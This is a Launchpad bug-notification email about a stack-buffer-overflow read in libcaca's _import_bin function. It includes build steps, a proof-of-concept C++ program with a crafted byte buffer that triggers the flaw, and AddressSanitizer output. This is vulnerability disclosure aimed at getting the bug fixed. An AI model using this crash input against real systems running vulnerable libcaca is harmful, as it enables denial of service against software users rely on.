[Touch-packages] [Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin

Tue, 22 Jun 2021 05:26:37 -0700 

** Bug watch added: github.com/cacalabs/libcaca/issues #56
   https://github.com/cacalabs/libcaca/issues/56

** Also affects: libcaca via
   https://github.com/cacalabs/libcaca/issues/56
   Importance: Unknown
       Status: Unknown

** Changed in: libcaca (Ubuntu)
       Status: New => Triaged

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1925468

Title:
  stack-buffer-overflow of import.c in function _import_bin

Status in libcaca:
  Unknown
Status in libcaca package in Ubuntu:
  Triaged

Bug description:
  Hello ubuntu security team

  issues:https://github.com/cacalabs/libcaca/issues/56

  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1

  
  libcaca version e4968ba

  Verification steps:
  1.Get the source code of libcaca
  2.Compile the libcaca.so library

  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make
  or

  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
  $ make
  3.Create the poc_bin.cc && build

  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include <assert.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <fstream>
  #include <iostream>

  using namespace std;

  void crash(const uint8_t *Data, size_t Size) {

    if(Size<8) return ;
    size_t len=0;
    caca_canvas_t *cv;
    cv = caca_create_canvas(0,0);
    caca_create_frame(cv,0);
    caca_set_frame(cv,0);
    caca_import_canvas_from_memory(cv,Data,Size,"bin");
    caca_free_canvas(cv);
    cv=NULL;

  }

  int main(int args,char* argv[]){
          size_t  len = 0;
          unsigned char buffer[] = 
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
          len = sizeof(buffer)/sizeof(unsigned char);
          printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
          crash((const uint8_t*)buffer,len);
          return 0;

  }
  4.compile poc_bin.cc

  clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address  
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_bin
  5.Run poc_bin
  asan info:

  =================================================================
  ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
  READ of size 1 at 0x7ffe7cd3774d thread T0
      #0 0x7f8c6314acfc in _import_bin 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
      #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
      #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
      #3 0x7f8c62ba00b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
      #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)

  Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
      #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

    This frame has 1 object(s):
      [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this 
variable
  HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
        (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
  Shadow bytes around the buggy address:
    0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  =>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
    0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  Shadow byte legend (one shadow byte represents 8 application bytes):
    Addressable:           00
    Partially addressable: 01 02 03 04 05 06 07
    Heap left redzone:       fa
    Freed heap region:       fd
    Stack left redzone:      f1
    Stack mid redzone:       f2
    Stack right redzone:     f3
    Stack after return:      f5
    Stack use after scope:   f8
    Global redzone:          f9
    Global init order:       f6
    Poisoned by user:        f7
    Container overflow:      fc
    Array cookie:            ac
    Intra object redzone:    bb
    ASan internal:           fe
    Left alloca redzone:     ca
    Right alloca redzone:    cb
    Shadow gap:              cc
  ==3817476==ABORTING

  Thanks

To manage notifications about this bug go to:
https://bugs.launchpad.net/libcaca/+bug/1925468/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Reply via email to